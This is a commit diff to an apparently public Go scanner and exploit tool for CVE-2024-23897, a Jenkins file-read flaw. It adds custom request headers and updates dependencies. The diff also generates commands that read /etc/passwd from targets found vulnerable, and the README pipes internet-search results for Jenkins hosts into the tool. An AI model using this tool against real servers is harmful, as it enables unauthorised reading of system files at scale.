🎉 #1 CVE-2024-23897 v1.0.2 add request headers

wjlin0 · Mar 16, 2024 · 2acd0f6 · 2acd0f6
1 parent 2d08e5f
commit 2acd0f6
Show file tree

Hide file tree

Showing 11 changed files with 101 additions and 37 deletions.
diff --git a/README.md b/README.md
@@ -17,15 +17,15 @@ go install github.com/wjlin0/CVE-2024-23897/cmd/CVE-2024-23897@latest
 ```
 或者
 安装完成的二进制文件在[release](https://github.com/wjlin0/CVE-2024-23897/releases)中下载
-- [macOS-arm64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.1/CVE-2024-23897_1.0.1_macOS_arm64.zip)
+- [macOS-arm64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.2/CVE-2024-23897_1.0.2_macOS_arm64.zip)
 
-- [macOS-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.1/CVE-2024-23897_1.0.1_macOS_amd64.zip)
+- [macOS-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.2/CVE-2024-23897_1.0.2_macOS_amd64.zip)
 
-- [linux-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.1/CVE-2024-23897_1.0.1_linux_amd64.zip)
+- [linux-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.2/CVE-2024-23897_1.0.2_linux_amd64.zip)
 
-- [windows-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.1/CVE-2024-23897_1.0.1_windows_amd64.zip)
+- [windows-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.2/CVE-2024-23897_1.0.2_windows_amd64.zip)
 
-- [windows-386](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.1/CVE-2024-23897_1.0.1_windows_386.zip)
+- [windows-386](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.2/CVE-2024-23897_1.0.2_windows_386.zip)
 
 
 # 使用
@@ -57,6 +57,7 @@ DEBUG:
    -p, -proxy string[]              list of http/socks5 proxy to use (comma separated or file input)
    -irt, -input-read-timeout value  timeout on input read (default 3m0s)
    -version                         show version of CVE-2024-23897 tool
+   -header string[]                 Add custom headers(or on file contents) to the request(e.g. -header 'Cookie: username=admin' or  -header header.txt)
    -no-stdin                        disable stdin processing
 
 LIMIT:
@@ -90,6 +91,7 @@ Run CVE-2024-23897 check vulnerability on a single targets by proxy server
 
 Run CVE-2024-23897 on uncovering Jenkins check vulnerability
         $ pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897
+
 ```
 
 use pathScan to collect targets and pass them to CVE-2024-23897 via standard input

diff --git a/go.mod b/go.mod
@@ -3,19 +3,27 @@ module github.com/wjlin0/CVE-2024-23897
 go 1.21.5
 
 require (
+	github.com/Masterminds/semver/v3 v3.2.1
+	github.com/charmbracelet/glamour v0.6.0
+	github.com/cheggaaa/pb/v3 v3.1.4
+	github.com/denisbrodbeck/machineid v1.0.1
 	github.com/fatih/color v1.15.0
+	github.com/google/go-github/v30 v30.1.0
 	github.com/google/uuid v1.6.0
+	github.com/minio/selfupdate v0.6.1-0.20230907112617-f11e74f84ca7
 	github.com/projectdiscovery/goflags v0.1.36
 	github.com/projectdiscovery/gologger v1.1.12
 	github.com/projectdiscovery/ratelimit v0.0.25
-	github.com/projectdiscovery/retryablehttp-go v1.0.42
-	github.com/projectdiscovery/utils v0.0.73
+	github.com/projectdiscovery/retryablehttp-go v1.0.48
+	github.com/projectdiscovery/utils v0.0.80
 	github.com/remeh/sizedwaitgroup v1.0.0
+	github.com/stretchr/testify v1.8.4
+	golang.org/x/oauth2 v0.11.0
 )
 
 require (
 	aead.dev/minisign v0.2.0 // indirect
-	github.com/Masterminds/semver/v3 v3.2.1 // indirect
+	github.com/Mzack9999/gcache v0.0.0-20230410081825-519e28eab057 // indirect
 	github.com/Mzack9999/go-http-digest-auth-client v0.6.1-0.20220414142836-eb8883508809 // indirect
 	github.com/VividCortex/ewma v1.2.0 // indirect
 	github.com/akrylysov/pogreb v0.10.1 // indirect
@@ -24,18 +32,16 @@ require (
 	github.com/asaskevich/govalidator v0.0.0-20230301143203-a9d515a09cc2 // indirect
 	github.com/aymanbagabas/go-osc52/v2 v2.0.1 // indirect
 	github.com/aymerick/douceur v0.2.0 // indirect
-	github.com/charmbracelet/glamour v0.6.0 // indirect
-	github.com/cheggaaa/pb/v3 v3.1.4 // indirect
 	github.com/cloudflare/circl v1.3.7 // indirect
 	github.com/cnf/structhash v0.0.0-20201127153200-e1b16c1ebc08 // indirect
-	github.com/denisbrodbeck/machineid v1.0.1 // indirect
+	github.com/davecgh/go-spew v1.1.1 // indirect
 	github.com/dimchansky/utfbom v1.1.1 // indirect
 	github.com/dlclark/regexp2 v1.8.1 // indirect
+	github.com/docker/go-units v0.5.0 // indirect
 	github.com/dsnet/compress v0.0.2-0.20210315054119-f66993602bf5 // indirect
 	github.com/gaukas/godicttls v0.0.4 // indirect
 	github.com/golang/protobuf v1.5.3 // indirect
 	github.com/golang/snappy v0.0.4 // indirect
-	github.com/google/go-github/v30 v30.1.0 // indirect
 	github.com/google/go-querystring v1.1.0 // indirect
 	github.com/gorilla/css v1.0.0 // indirect
 	github.com/json-iterator/go v1.1.12 // indirect
@@ -49,7 +55,6 @@ require (
 	github.com/mholt/archiver/v3 v3.5.1 // indirect
 	github.com/microcosm-cc/bluemonday v1.0.25 // indirect
 	github.com/miekg/dns v1.1.56 // indirect
-	github.com/minio/selfupdate v0.6.1-0.20230907112617-f11e74f84ca7 // indirect
 	github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd // indirect
 	github.com/modern-go/reflect2 v1.0.2 // indirect
 	github.com/muesli/reflow v0.3.0 // indirect
@@ -58,11 +63,12 @@ require (
 	github.com/olekukonko/tablewriter v0.0.5 // indirect
 	github.com/pierrec/lz4/v4 v4.1.2 // indirect
 	github.com/pkg/errors v0.9.1 // indirect
+	github.com/pmezard/go-difflib v1.0.0 // indirect
 	github.com/projectdiscovery/blackrock v0.0.1 // indirect
-	github.com/projectdiscovery/fastdialer v0.0.50 // indirect
-	github.com/projectdiscovery/hmap v0.0.33 // indirect
-	github.com/projectdiscovery/networkpolicy v0.0.6 // indirect
-	github.com/projectdiscovery/retryabledns v1.0.48 // indirect
+	github.com/projectdiscovery/fastdialer v0.0.61 // indirect
+	github.com/projectdiscovery/hmap v0.0.41 // indirect
+	github.com/projectdiscovery/networkpolicy v0.0.7 // indirect
+	github.com/projectdiscovery/retryabledns v1.0.58 // indirect
 	github.com/quic-go/quic-go v0.37.7 // indirect
 	github.com/refraction-networking/utls v1.5.4 // indirect
 	github.com/rivo/uniseg v0.4.4 // indirect
@@ -91,7 +97,6 @@ require (
 	golang.org/x/exp v0.0.0-20221205204356-47842c84f3db // indirect
 	golang.org/x/mod v0.12.0 // indirect
 	golang.org/x/net v0.17.0 // indirect
-	golang.org/x/oauth2 v0.11.0 // indirect
 	golang.org/x/sys v0.16.0 // indirect
 	golang.org/x/text v0.14.0 // indirect
 	golang.org/x/tools v0.13.0 // indirect

diff --git a/go.sum b/go.sum
@@ -3,6 +3,8 @@ aead.dev/minisign v0.2.0/go.mod h1:zdq6LdSd9TbuSxchxwhpA9zEb9YXcVGoE8JakuiGaIQ=
 cloud.google.com/go/compute/metadata v0.2.0/go.mod h1:zFmK7XCadkQkj6TtorcaGlCW1hT1fIilQDwofLpJ20k=
 github.com/Masterminds/semver/v3 v3.2.1 h1:RN9w6+7QoMeJVGyfmbcgs28Br8cvmnucEXnY0rYXWg0=
 github.com/Masterminds/semver/v3 v3.2.1/go.mod h1:qvl/7zhW3nngYb5+80sSMF+FG2BjYrf8m9wsX0PNOMQ=
+github.com/Mzack9999/gcache v0.0.0-20230410081825-519e28eab057 h1:KFac3SiGbId8ub47e7kd2PLZeACxc1LkiiNoDOFRClE=
+github.com/Mzack9999/gcache v0.0.0-20230410081825-519e28eab057/go.mod h1:iLB2pivrPICvLOuROKmlqURtFIEsoJZaMidQfCG1+D4=
 github.com/Mzack9999/go-http-digest-auth-client v0.6.1-0.20220414142836-eb8883508809 h1:ZbFL+BDfBqegi+/Ssh7im5+aQfBRx6it+kHnC7jaDU8=
 github.com/Mzack9999/go-http-digest-auth-client v0.6.1-0.20220414142836-eb8883508809/go.mod h1:upgc3Zs45jBDnBT4tVRgRcgm26ABpaP7MoTSdgysca4=
 github.com/VividCortex/ewma v1.2.0 h1:f58SaIzcDXrSy3kWaHNvuJgJ3Nmz59Zji6XoJR/q1ow=
@@ -43,6 +45,8 @@ github.com/dimchansky/utfbom v1.1.1/go.mod h1:SxdoEBH5qIqFocHMyGOXVAybYJdr71b1Q/
 github.com/dlclark/regexp2 v1.4.0/go.mod h1:2pZnwuY/m+8K6iRw6wQdMtk+rH5tNGR1i55kozfMjCc=
 github.com/dlclark/regexp2 v1.8.1 h1:6Lcdwya6GjPUNsBct8Lg/yRPwMhABj269AAzdGSiR+0=
 github.com/dlclark/regexp2 v1.8.1/go.mod h1:DHkYz0B9wPfa6wondMfaivmHpzrQ3v9q8cnmRbL6yW8=
+github.com/docker/go-units v0.5.0 h1:69rxXcBk27SvSaaxTtLh/8llcHD8vYHT7WSdRZ/jvr4=
+github.com/docker/go-units v0.5.0/go.mod h1:fgPhTUdO+D/Jk86RDLlptpiXQzgHJF7gydDDbaIK4Dk=
 github.com/dsnet/compress v0.0.2-0.20210315054119-f66993602bf5 h1:iFaUwBSo5Svw6L7HYpRu/0lE3e0BaElwnNO1qkNQxBY=
 github.com/dsnet/compress v0.0.2-0.20210315054119-f66993602bf5/go.mod h1:qssHWj60/X5sZFNxpG4HBPDHVqxNm4DfnCKgrbZOT+s=
 github.com/dsnet/golib v0.0.0-20171103203638-1ea166775780/go.mod h1:Lj+Z9rebOhdfkVLjJ8T6VcRQv3SXugXy999NBtR9aFY=
@@ -166,24 +170,24 @@ github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZb
 github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
 github.com/projectdiscovery/blackrock v0.0.1 h1:lHQqhaaEFjgf5WkuItbpeCZv2DUIE45k0VbGJyft6LQ=
 github.com/projectdiscovery/blackrock v0.0.1/go.mod h1:ANUtjDfaVrqB453bzToU+YB4cUbvBRpLvEwoWIwlTss=
-github.com/projectdiscovery/fastdialer v0.0.50 h1:NJyuiSMi0Fy78+qSVhqRs83NtKyM91dJ5x778kshiOQ=
-github.com/projectdiscovery/fastdialer v0.0.50/go.mod h1:y8X6at1FyRwmSig6+amuRXnxViDRGGK7S2EAvxf7mDo=
+github.com/projectdiscovery/fastdialer v0.0.61 h1:z5OzP9lRbn6fSIezgReKC3hkzRh+YX41ST9OgkVEm/s=
+github.com/projectdiscovery/fastdialer v0.0.61/go.mod h1:FyxJ0m1MwB69nLmdXYqK32f3a0Pf+5YpC8wBY73baiE=
 github.com/projectdiscovery/goflags v0.1.36 h1:gElwVU9BJsUbxjyHqDTmlGsB8Br2DDxbfMQMXLYvYhg=
 github.com/projectdiscovery/goflags v0.1.36/go.mod h1:A+MLWJgGKZ2WUED0ZlW5EQ4mmJ/s71VnvY6KF5ThLaM=
 github.com/projectdiscovery/gologger v1.1.12 h1:uX/QkQdip4PubJjjG0+uk5DtyAi1ANPJUvpmimXqv4A=
 github.com/projectdiscovery/gologger v1.1.12/go.mod h1:DI8nywPLERS5mo8QEA9E7gd5HZ3Je14SjJBH3F5/kLw=
-github.com/projectdiscovery/hmap v0.0.33 h1:kDkw4xVE8uyko6Cv3Cd9MZsHByn9BtXK3y7PeLKVBs4=
-github.com/projectdiscovery/hmap v0.0.33/go.mod h1:IlKSbnFKtn68STLiNwc5Kbu4GaR6aIsGaHbpFOYNFGY=
-github.com/projectdiscovery/networkpolicy v0.0.6 h1:yDvm0XCrS9HeemRrBS+J+22surzVczM94W5nHiOy/1o=
-github.com/projectdiscovery/networkpolicy v0.0.6/go.mod h1:8HJQ/33Pi7v3a3MRWIQGXzpj+zHw2d60TysEL4qdoQk=
+github.com/projectdiscovery/hmap v0.0.41 h1:8IgTyDce3/2JzcfPVA4H+XpBRFfETULx8td3BMdSYVE=
+github.com/projectdiscovery/hmap v0.0.41/go.mod h1:bCrai6x5Eijqm2U+jtcH0wZX5ZcaZhcvzoMGTZgLAf0=
+github.com/projectdiscovery/networkpolicy v0.0.7 h1:AwHqBRXBqDQgnWzBMuoJtHBNEYBw+NFp/4qIK688x7o=
+github.com/projectdiscovery/networkpolicy v0.0.7/go.mod h1:CK0CnFoLF1Nou6mY7P4WODSAxhPN8g8g7XpapgEP8tI=
 github.com/projectdiscovery/ratelimit v0.0.25 h1:CTt2/bbxfj7IrUelubra1g2OQBanaefyGfPYHQ+5q5A=
 github.com/projectdiscovery/ratelimit v0.0.25/go.mod h1:rZ1ZT0EN2hAk1OWFH0wgWhfYJssyWPV9VtOabXgCmwc=
-github.com/projectdiscovery/retryabledns v1.0.48 h1:7m4aB5IK3P6UKkA4abBxerJYApzP4yraXj4Ju8kZ9zU=
-github.com/projectdiscovery/retryabledns v1.0.48/go.mod h1:XvdWQjIaohj9HTS+5ZxL6fRCoOP4JpB6w78eiXXDia4=
-github.com/projectdiscovery/retryablehttp-go v1.0.42 h1:NW76U/r0pWNi6iudBqggG69sN8aguuXLLbGRkLvniyo=
-github.com/projectdiscovery/retryablehttp-go v1.0.42/go.mod h1:NWR4amTNHwM+ALk1QL1HiyzhFejRTMCHapM+oSoNSv8=
-github.com/projectdiscovery/utils v0.0.73 h1:KWzxzJv9U5YKHGGOvkKHJmO7NdV5Kbzc8lPt+Frdj0o=
-github.com/projectdiscovery/utils v0.0.73/go.mod h1:SEb3ZoGy1nxdnPNXAGhMZNhRcokRkoMEjC6l9H59t1s=
+github.com/projectdiscovery/retryabledns v1.0.58 h1:ut1FSB9+GZ6zQIlKJFLqIz2RZs81EmkbsHTuIrWfYLE=
+github.com/projectdiscovery/retryabledns v1.0.58/go.mod h1:RobmKoNBgngAVE4H9REQtaLP1pa4TCyypHy1MWHT1mY=
+github.com/projectdiscovery/retryablehttp-go v1.0.48 h1:/f1JPQyti7NQOVUI44IjP514q39+6RR1NDAUr9QhqkA=
+github.com/projectdiscovery/retryablehttp-go v1.0.48/go.mod h1:iJwvFiUBA8DmVIk0dP8r9+kqLvnXEe3W+g/hcZofkWY=
+github.com/projectdiscovery/utils v0.0.80 h1:daFuQwhVRtQ14JZs3DnI9ubaX273S8V1dZ+x/vr+YbI=
+github.com/projectdiscovery/utils v0.0.80/go.mod h1:WXm3MIzKhgqUtTMwxDIW5bWe5nWkCYqRlZeqin0FqTc=
 github.com/quic-go/quic-go v0.37.7 h1:AgKsQLZ1+YCwZd2GYhBUsJDYZwEkA5gENtAjb+MxONU=
 github.com/quic-go/quic-go v0.37.7/go.mod h1:YsbH1r4mSHPJcLF4k4zruUkLBqctEMBDR6VPvcYjIsU=
 github.com/refraction-networking/utls v1.5.4 h1:9k6EO2b8TaOGsQ7Pl7p9w6PUhx18/ZCeT0WNTZ7Uw4o=

diff --git a/pkg/runner/banner.go b/pkg/runner/banner.go
@@ -13,7 +13,7 @@ const banner = `
 \____/  |___/_____/    /____\____/____/ /_/       /____/____/\____//____/ /_/
 `
 const (
-	version  = `1.0.1`
+	version  = `1.0.2`
 	repoName = `CVE-2024-23897`
 )
 

diff --git a/pkg/runner/header.go b/pkg/runner/header.go
@@ -0,0 +1,17 @@
+package runner
+
+import (
+	"github.com/wjlin0/CVE-2024-23897/pkg/types"
+	"strings"
+)
+
+func loadHeaders(options *types.Options) error {
+
+	for _, header := range options.Headers {
+		if !strings.Contains(header, ":") {
+			continue
+		}
+		types.Headers[strings.Split(header, ":")[0]] = strings.Split(header, ":")[1]
+	}
+	return nil
+}
diff --git a/pkg/runner/options.go b/pkg/runner/options.go
@@ -33,6 +33,7 @@ func ParseOptions() *types.Options {
 		flagSet.StringSliceVarP(&options.ProxyURL, "proxy", "p", nil, "list of http/socks5 proxy to use (comma separated or file input)", goflags.FileCommaSeparatedStringSliceOptions),
 		flagSet.DurationVarP(&options.InputReadTimeout, "input-read-timeout", "irt", 3*time.Minute, "timeout on input read"),
 		flagSet.CallbackVar(ShowVersion, "version", "show version of CVE-2024-23897 tool"),
+		flagSet.StringSliceVar(&options.Headers, "header", nil, "Add custom headers(or on file contents) to the request(e.g. -header 'Cookie: username=admin' or  -header header.txt)", goflags.FileCommaSeparatedStringSliceOptions),
 		flagSet.BoolVar(&options.DisableStdin, "no-stdin", false, "disable stdin processing"),
 	)
 	flagSet.CreateGroup("limit", "Limit",

diff --git a/pkg/runner/runner.go b/pkg/runner/runner.go
@@ -153,12 +153,7 @@ func (r *Runner) RunEnumeration() error {
 					return
 				}
 				r.AddSuccess()
-				if full {
-					result.Response = color.HiGreenString("The target is Vulnerable && This cab read full file contents\n") + "please use command to read full body. \n" + color.HiYellowString(fmt.Sprintf("$ CVE-2024-23897 -u %s -c %s -a /etc/passwd", target.ToString(), result.Response))
-
-				} else {
-					result.Response = color.HiGreenString("The target is Vulnerable.\n") + "please use command to read file first content. \n" + color.HiYellowString(fmt.Sprintf("$ CVE-2024-23897 -u %s -c %s -a /etc/passwd", target.ToString(), result.Response))
-				}
+				r.loadExecByUser(target, full, result)
 				r.Output(result)
 
 			}(target)
@@ -215,3 +210,33 @@ func (r *Runner) displayExecutionInfo() {
 	gologger.Info().Msgf("Loaded %d targets from input", len(r.targets))
 
 }
+
+func (r *Runner) loadExecByUser(target *input.Target, full bool, result *output.ResultEvent) {
+	buffer := strings.Builder{}
+	if full {
+		buffer.WriteString(color.HiGreenString("The target is Vulnerable && This can read full file contents\n") + "please use command to read full body. \n")
+	} else {
+		buffer.WriteString(color.HiGreenString("The target is Vulnerable.\n") + "please use command to read file first content. \n")
+	}
+	buffer.WriteString(color.HiYellowString(fmt.Sprintf("$ CVE-2024-23897 -u %s -c %s -a /etc/passwd", target.ToString(), result.Response)))
+	if r.options.ProxyURL != nil {
+		for _, p := range r.options.ProxyURL {
+			buffer.WriteString(color.HiYellowString(fmt.Sprintf(" -p '%s'", p)))
+		}
+	}
+	if r.options.Timeout != 10 {
+		buffer.WriteString(color.HiYellowString(fmt.Sprintf(" -timeout %d", r.options.Timeout)))
+	}
+	if r.options.Thread != 30 {
+		buffer.WriteString(color.HiYellowString(fmt.Sprintf(" -t %d", r.options.Thread)))
+	}
+	if r.options.RateLimit != -1 {
+		buffer.WriteString(color.HiYellowString(fmt.Sprintf(" -rate-limit %d", r.options.RateLimit)))
+	}
+	if r.options.Headers != nil {
+		for _, h := range r.options.Headers {
+			buffer.WriteString(color.HiYellowString(fmt.Sprintf(" -header '%s'", h)))
+		}
+	}
+	result.Response = buffer.String()
+}
diff --git a/pkg/runner/validate.go b/pkg/runner/validate.go
@@ -18,6 +18,9 @@ func ValidateRunEnumeration(options *types.Options) error {
 	if err := loadProxyServers(options); err != nil {
 		return err
 	}
+	if err := loadHeaders(options); err != nil {
+		return err
+	}
 
 	if options.Exec && options.ListAvailableCommands {
 		return fmt.Errorf("cannot use -exec and -list-available-commands at the same time")

diff --git a/pkg/scanner/scanner.go b/pkg/scanner/scanner.go
@@ -72,5 +72,9 @@ func NewScanner(options *types.Options) (*Scanner, error) {
 
 func (s *Scanner) Do(request *retryablehttp.Request) (*http.Response, error) {
 	_ = s.rateLimiter.Take("default")
+	for k, v := range types.Headers {
+		request.Header.Add(k, v)
+	}
+
 	return s.client.Do(request)
 }
diff --git a/pkg/types/options.go b/pkg/types/options.go
@@ -18,6 +18,7 @@ type Options struct {
 	RateLimit             int
 	Thread                int
 	InputReadTimeout      time.Duration
+	Headers               goflags.StringSlice
 	Stdin                 bool
 	Timeout               int
 	Exec                  bool

diff --git a/pkg/types/proxy.go b/pkg/types/proxy.go
@@ -3,4 +3,6 @@ package types
 var (
 	// ProxyURL is the URL for the proxy server
 	ProxyURL string
+	// Headers contains the headers to be used in the request
+	Headers = make(map[string]string)
 )